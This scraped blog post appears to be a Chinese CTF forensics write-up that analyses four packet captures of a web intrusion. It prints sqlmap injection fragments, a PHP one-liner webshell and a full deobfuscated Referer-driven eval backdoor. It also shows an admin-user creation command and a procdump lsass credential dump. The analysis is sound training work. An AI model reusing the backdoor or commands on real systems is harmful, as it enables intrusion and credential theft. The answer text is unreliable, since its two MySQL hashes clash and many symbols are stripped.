当前位置: 首页 > news >正文

h5网站建设 网站定制开发外包加工网官网下载

h5网站建设 网站定制开发,外包加工网官网下载,网站与备案信息不符,建站售后服务目录 前言 一、题目一(1.pcap) 二、题目二(2.pcap) 三、题目三(3.pcap) 四、题目四(4.pcap) 前言 Wireshark流量包分析对于安全来说是很重要的#xff0c;我们可以通过Wireshark来诊断网络问题#xff0c;检测网络攻击、监控网络流量以及捕获恶意软件等等 接下来我们…目录 前言  一、题目一(1.pcap) 二、题目二(2.pcap) 三、题目三(3.pcap) 四、题目四(4.pcap) 前言  Wireshark流量包分析对于安全来说是很重要的我们可以通过Wireshark来诊断网络问题检测网络攻击、监控网络流量以及捕获恶意软件等等 接下来我们来看一道数据分析题需要4个流量包 1-4.pcap网盘链接自行提取 链接百度网盘 请输入提取码 提取码hrc4 一、题目一(1.pcap) 题目要求 1.黑客攻击的第一个受害主机的网卡IP地址 2.黑客对URL的哪一个参数实施了SQL注入 3.第一个受害主机网站数据库的表前缀加上下划线例如abc 4.第一个受害主机网站数据库的名字 看到题目SQL注入那就首先过滤http和https协议 过滤后可以看到两个出现次数比较多的ip202.1.1.2和192.168.1.8可以看到202.1.1.2对192.168.1.8进行了攻击 这里第一个问题的答案就出来了受害主机网卡IP是192.168.1.8 202.1.1.2为攻击者IP 然后直接看源IP为202.1.1.2的http请求包 这里随便先看一个包urlcode解码后如下 可以看到黑客使用了SQL注入试图构造存储型xss optioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select](XfqR2916 AND 11 UNION ALL SELECT 1,NULL,scriptalert(XSS)/script,tab 再看一个包同样urlcode解码 分析后发现仍在尝试SQL注入注入工具sqlmap注入点为list[select] optioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select]( OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883 然后我们去追踪一个SQL注入的TCP流 可以看到数据库为MariaDB已经报错而且表前缀为ajtuc_ 要找到数据库名的话我们最好去最后那几条去找看到url中如果包含schema关键字那大概率就是数据库名 这里的数据库名使用十六进制解码解码出来就是joomla 答案 1.黑客攻击的第一个受害主机的网卡IP地址  192.168.1.8 2.黑客对URL的哪一个参数实施了SQL注入 list[select] 3.第一个受害主机网站数据库的表前缀(加上下划线例如abc_) ajtuc_ 4.第一个受害主机网站数据库的名字 joomla 二、题目二(2.pcap) 打开2.pcap 题目要求 1.黑客第一次获得的php木马的密码是什么 2.黑客第二次上传php木马是什么时间 3.第二次上传的木马通过HTTP协议中的哪个头传递数据 题目要求php木马的密码首先我们要知道php一句话木马一般都是POST请求 所以我们直接过滤POST请求发现这个IP请求了一个名为kkkaaa.php的php文件很可疑 正常文件不会以此命名的 打开数据包看一下发现了这个字段 Form item: zzz eval(base64_decode($_POST[z0])); 其实一句话木马密码已经出来了就是zzz 这里他上传的一句话木马应该是 ?php eval($_POST[zzz]);? 然后又将eval(base64_decode($_POST[z0]));传入zzz参数目的是将z0传入的数据进行base64的解码 此时z0传入base64编码后的数据便可以执行恶意代码 解码后发现执行了dirname函数目的是查看当前路径下的文件或目录类似linux下的ls命令 第二题是第二次上传木马的时间 没有头绪的话来分析下过滤出来的这几个包其他参数都一样重要的是Length这个字段 第一个包毋庸置疑是会比其他包长一点但是第四个包很奇怪和其他包相比长了150多字节左右 追踪tcp流 可以明显看到z2很不正常其他参数都是urlcode和base64编码 z2使用十六进制编码我们来解码看一下 这样的PHP代码是通过混淆过的让我们根本看不懂他的代码 经过还原后的代码  ?php $kh cb42; $kf e130; function x($t, $k) {$c strlen($k);$l strlen($t);$o ;for ($i 0; $i $l;) {for ($j 0; ($j $c $i $l); $j, $i) {$o . $t{$i} ^ $k{$j};}}return $o; }$r $_SERVER; $rr $r[HTTP_REFERER]; $ra $r[HTTP_ACCEPT_LANGUAGE]; if ($rr $ra) {$u parse_url($rr);parse_str($u[query], $q);$q array_values($q);preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/, $ra, $m);if ($q $m) {session_start();$s $_SESSION;$ss substr;$sl strtolower;$i $m[1][0] . $m[1][4];$h $sl($ss(md5($i . $kh), 0, 3));$f $sl($ss(md5($i . $kf), 0, 3));$p ;for ($z 1; $z count($m[1]); $z) $p . $q[$m[2][$z]];if (strpos($p, $h) 0) {$s[$i] ;$p $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] . $p;$e strpos($s[$i], $f);if ($e) {$k $kh . $kf;ob_start();eval(gzuncompress(x(base64_decode(preg_replace(array(/_/, /-/), array(/, ), $ss($s[$i], 0, $e))), $k)));$o ob_get_contents();ob_end_clean();$d base64_encode(x(gzcompress($o), $k));print($k$d/$k);session_destroy();}}} } ? 检查后发现create_function函数这个函数是可以执行命令的 官方也提示这个函数在8.0已经被移除并且和eval()函数有同样的安全隐患 说明黑客是利用了create_function函数来上传了自己的木马 时间的话ctrlf选择分组详情选择字符串搜索time字符串时间就出来了 Feb  7, 2018 17:20:44.248365000 中国标准时间 然后我们来分析一下这个木马 木马要利用就必然会与数据包进行交互仔细看看这两行代码 $rr $r[HTTP_REFERER]; $ra $r[HTTP_ACCEPT_LANGUAGE]; 这两行代码是获取http请求中的referer和accept_language字段的与数据包产生了交互 所以可以基本断定这两个字段是黑客用来传输他想执行的命令的 我们随便看一个访问footer.php的包 发现Referer字段长度很不正常Accept-Language字段正常 所以可以基本确定木马通过HTTP协议中的referer头传递数据 答案  1.黑客第一次获得的php木马的密码是什么 zzz 2.黑客第二次上传php木马是什么时间 17:20:44.248365 3.第二次上传的木马通过HTTP协议中的哪个头传递数据 Referer 三、题目三(3.pcap) 打开3.pcap 题目要求 1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash) 2.php代理第一次被使用时最先连接了哪个IP地址 题目要求mysql的数据直接过滤tcp contains mysql mysql 发现黑客一直在爆破MySQL密码 我们找到最后一条可能是爆破成功的密码 用户admin 密码Hash4858e7dcb0968daa7b599be4b0edb88a25ad89ac 然后过滤http请求发现名为tunnel.php的php文件 点开可以清晰地看到php代理第一次连接的IP地址是4.2.2.2端口53  答案 1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)    admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4 2.php代理第一次被使用时最先连接了哪个IP地址    4.2.2.2 四、题目四(4.pcap) 打开4.pcap 题目要求 1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候 2.黑客在内网主机中添加的用户名和密码是多少 3.黑客从内网服务器中下载下来的文件名 获取当前目录的文件列表的命令Windows中是dirlinux中是ls 直接过滤 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains dir || http contains ls) 发现有ls也有dir 追踪tcp流发现第一次的ls没有执行成功因为没有服务器回显 第二次的dir执行成功了 搜索时间 Feb  7, 2018 18:36:59.770782000 中国标准时间 在Windows下添加用户必然要使用net user管理员用户回显Administrator所以我们直接过滤 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains user || http contains Administrator) 这里看到是没有任何用户的时间Feb  7, 2018 18:49:27.767754000 中国标准时间 再往后面看发现已经添加了管理员用户kaka时间 Feb  7, 2018 18:50:42.908737000 中国标准时间  那么黑客必然是在这个时间段执行了添加用户的命令 然后我们就来看这期间的http请求直接通过时间过滤 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http frame.time_relative 827.109385 frame.time_relative 902.267039 最终我们发现这个不寻常的请求 通过base64解码发现 cd/dC:\phpStudy\WWW\b2evolution\install\test\net user kaka kaka /addecho [S]cdecho [E] 用户名和密码分别为   kaka:kaka 最后一题是下载一句话木马是POST请求而且攻击的IP地址为192.168.2.20那就直接过滤 ip.dst 192.168.2.20 http.request.method POST 筛出来之后没办法只有一个个看base64解码  然后在最后发现了这个包 解码后  cd/dC:\phpStudy\WWW\b2evolution\install\test\procdump.exe -accepteula -ma lspasss.dmpecho [S]cdecho [E]  发现使用了procdump.exe 往后看发现了这个包 解码出来是这样的  C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp 最后我们可以确定黑客下载了lsass.exe_180208_185247.dmp文件 答案 1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候 Feb  7, 2018 18:36:59.770782000 2.黑客在内网主机中添加的用户名和密码是多少 kaka:kaka 3.黑客从内网服务器中下载下来的文件名 lsass.exe_180208_185247.dmp
http://www.dnsts.com.cn/news/83413.html

相关文章:

  • 地方网站收录甘肃机械化建设工程有限公司网站
  • cms网站制作vancl凡客诚品正品
  • 上海网站开发运营新莱芜客户端
  • 上海魔力网站建设公司网站免费认证
  • 手机免费云服务器永久使用河南企业站seo
  • 服务器php网站打不开网页制作软件dw与python软件对比
  • 自做的网站如何发布templatemonster wordpress
  • 网站模板 金融推广普通话活动方案
  • html网站分页怎么做建商城网站
  • 做简图的网站学校网站建设客户需求调查问卷
  • 邢台做移动网站报价公司宣传软文
  • 做视频网站需要什么资质晋江网站建设晋江
  • 怎样建设网站论文郑州新闻最新消息今天
  • 园林景观设计网站推荐建设网站中期要做什么
  • 建设特效网站生态网站模板
  • 网站推广的分类网络科技公司上班做些什么
  • 注册网站挣钱网站管理助手创建数据库
  • 手机网站跳出率低易语言 wordpress
  • 黑龙江建设厅网站 孙宇建设工程公司企业文化
  • 城乡建设局网站首页加密网站开发多少钱
  • 礼泉做网站网站pc客户端制作
  • 网站建设的软件wordpress用redis和mem
  • 做网站的意义是什么照片生成视频制作软件
  • 深圳三合一建设网站网上做汽配生意的网站
  • 有好点的做网站的公司吗给网站做优化刷活跃要收费吗
  • 校园网站建设平台wordpress星座主题自适应
  • 泉州网站seo网页设计创建网站的基本流程
  • 在哪个网站做简历比较好可不可以用帝国cms做企业网站
  • 现在流行用什么做网站域名论坛
  • 桐城住房和城乡建设局网站查备案怎么查询